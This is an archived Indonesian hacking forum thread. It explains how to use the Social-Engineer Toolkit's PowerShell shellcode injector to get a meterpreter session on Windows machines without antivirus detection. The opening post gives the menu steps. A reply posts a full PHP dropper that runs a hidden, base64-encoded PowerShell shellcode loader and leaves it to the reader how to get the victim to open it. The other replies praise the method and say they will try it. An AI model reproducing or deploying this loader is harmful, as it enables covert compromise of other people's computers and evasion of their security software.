+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+--- Thread: SET : Powershell, Bypass AV (/thread-3573.html)
Pages:
1
2
SET : Powershell, Bypass AV - u5h4nt - 08-29-2012
Assalamualaikum, selamat pagi semuaa.
udah lama ini gug nulis thread lagi .. hehehe
kali ini cuman mw share sedikit info tentang bagaimana kita mem-pwn mesin windows (hampir semua versi windows saat ini) tanpa terdeteksi anti virus apapun (insyaallah, cuman test di Avast Pro aja sih , hehehhe)
Biasanya untuk melakukan exploitasi, terlebih dahulu kita menggunakan backdoor untuk mendapatkan akses ke sistem target, namun butuh sedikit (banyak) keterampilan bermain BD untuk bisa membuat BD yang sesamar mungkin sehingga tidak tercium ama AV, karena itu banyak BD yang berakhir tragis di tangan AV2 kelas wahid ..
Kali ini kita akan coba cara lain yang lebih simple, yaitu powershell yang hampir ada di semua versi windows saat ini. langsung saja nyalakan SET nya ..
Pilih 1) Social-Engineering Attacks
Pilih 10) Powershell Attack Vectors
Pilih 1) Powershell Alphanumeric Shellcode Injector
Masukkan IP Address dan PORT yang akan kita gunakan untuk listenning, setelah di generate ama si SETnya terus kita jalankan listener nya (pilih YES), lalu pilih jenis arsitektur dari mesin target (x64=64b / x86=32b)
![[Image: Screenshotfrom2012-08-29044233.png]](http://i1168.photobucket.com/albums/r482/KhairilUshan/Screenshotfrom2012-08-29044233.png)
Setelah payloadnya listenning, maka SET akan meng-generate file text yang ada di
Code:
[root@rrsatudua powershell]# pwd
/home/rr12/Applications/set/reports/powershell
[root@rrsatudua powershell]# ls
powershell.rc x64_powershell_injection.txt x86_powershell_injection.txtkarena target saya windows 7 x86 jadi saya pilih x86_powershell_injection.txt
berikutnya coba paste isi file itu ke command prompt windows (cmd.exe), terus enter
![[Image: 1.png]](http://i1168.photobucket.com/albums/r482/KhairilUshan/1.png)
maka kita langsung akan mendapatkan session meterpreter ke mesin target.
![[Image: Screenshotfrom2012-08-29044706.png]](http://i1168.photobucket.com/albums/r482/KhairilUshan/Screenshotfrom2012-08-29044706.png)
![[Image: Screenshotfrom2012-08-29050102.png]](http://i1168.photobucket.com/albums/r482/KhairilUshan/Screenshotfrom2012-08-29050102.png)
![[Image: Screenshotfrom2012-08-29044736.png]](http://i1168.photobucket.com/albums/r482/KhairilUshan/Screenshotfrom2012-08-29044736.png)
doneee, hehehhe tinggal di bumbuhi sedikit kreatifitas lagi untuk mendukung trik ini ..
think out of the box siihh katanyaaaa .. Code:
Perangkat saya :
Fedora 17
[root@rrsatudua set]# uname -a
Linux rrsatudua 3.5.2-3.fc17.i686 #1 SMP Tue Aug 21 19:48:20 UTC 2012 i686 i686 i386 GNU/Linux
SET version : 3.7.1 (last update)Reference : http://vimeo.com/14581715 [DEFCON 18 : Penetration testing on Powershell by Deve Kenedy]
Sekian dari saya ..
mudah2an bermanfaat untuk kita semuaa .. bonus
Spoiler! :
![[Image: header.jpg]](http://www.jkt48.com/images/header.jpg)
RE: SET : Powershell, Bypass AV - iKONspirasi - 08-29-2012
walaikumsalam, wah om RR12 buat trit lagi
Windows Powershell sudah ada di semua versi windows sejak tahun 2009, jadi memang bisa diterapkan dengan OS windows apa aja. platform yg digunakan adalah .NET
berarti kita buat batch file untuk exec file powershell.txt di pc korban ya? hmm seharusnya mudah nih kan ga kedetek AV....ngeriii om RR12 good job
+2 dari ane
RE: SET : Powershell, Bypass AV - u5h4nt - 08-29-2012
(08-29-2012, 06:14 AM)konspirasi Wrote: walaikumsalam, wah om RR12 buat trit lagi
Windows Powershell sudah ada di semua versi windows sejak tahun 2009, jadi memang bisa diterapkan dengan OS windows apa aja. platform yg digunakan adalah .NET
berarti kita buat batch file untuk exec file powershell.txt di pc korban ya? hmm seharusnya mudah nih kan ga kedetek AV....ngeriii om RR12 good job
+2 dari ane
wiiihh makasih om iKons, mudah2an bsa dikembangin lagi ...
selain buat file bat, klo mau via web based juga bisa kayaknya, tinggal buat file php,
misalnya ..
Code:
<?php
system("cmd /c powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand JABjAG8AZABlACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3AGkAbgBGAHUAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBvAGQAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMANgA0ACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAOQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADYANAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAA4AGIALAAwAHgANwAyACwAMAB4ADIAOAAsADAAeAAwAGYALAAwAHgAYgA3ACwAMAB4ADQAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADAALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYQAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4AGUAMwAsADAAeAAzAGMALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANAAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAyACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgAMwAzACwAMAB4ADMAMgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANwAzACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeABiADgALAAwAHgAOQAwACwAMAB4ADAAMQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAOQAsADAAeABjADQALAAwAHgANQA0ACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAMgA5ACwAMAB4ADgAMAAsADAAeAA2AGIALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA3ACwAMAB4ADYAYQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4AGMAMAAsADAAeABhADgALAAwAHgAMAAxACwAMAB4ADEANQAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4ADAAMAAsADAAeAAwADEALAAwAHgAYgBiACwAMAB4ADgAOQAsADAAeABlADYALAAwAHgANgBhACwAMAB4ADEAMAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAA5ADkALAAwAHgAYQA1ACwAMAB4ADcANAAsADAAeAA2ADEALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAAwAGMALAAwAHgAZgBmACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABkADkALAAwAHgAYwA4ACwAMAB4ADUAZgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAYgAsADAAeAAzADYALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABkADkALAAwAHgAYwA4ACwAMAB4ADUAZgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAMgA5ACwAMAB4AGMANgAsADAAeAA4ADUALAAwAHgAZgA2ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgAYwAzADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgACQAcwBjADYANAA7ACQAcwBpAHoAZQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABzAGMALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQAgAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwBpAG4ARgB1AG4AYwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAaQBuAEYAdQBuAGMAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAaQBuAEYAdQBuAGMAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQAgAHsAIABTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAIAB9ADsA")
?>terserah deh bagaimana caranya spaya file itu di buka di mesin target ..
RE: SET : Powershell, Bypass AV - Udalah - 08-29-2012
nice share om +1 dulu, ane kembangin yah om
RE: SET : Powershell, Bypass AV - bee1k - 08-29-2012
mantapp dah tritnya
bookmark dulu om nnti di pelajarin
RE: SET : Powershell, Bypass AV - kuch1k1 - 08-29-2012
Nice thread banget om,,.....
perlu ke TKP nih
pamit mau coba
RE: SET : Powershell, Bypass AV - u5h4nt - 08-29-2012
yoaiii, semuanya silahkan di coba. klo ada yg baru lagi di share jg yahh
RE: SET : Powershell, Bypass AV - Al - Ayyubi - 08-29-2012
thnk's Om RR12 sharenya
sekalinya share muantap banget
ijin coba sekalian ya om
RE: SET : Powershell, Bypass AV - bunglonhijau - 08-30-2012
akhirnya.. nulis lagi, ta' cobain dulu mas.. nice share
+1
RE: SET : Powershell, Bypass AV - betefive - 08-30-2012
mantraaapppp.... ane mw kasih +100 tp ga bsa om,, thanks ny aja y,, ehehehehehe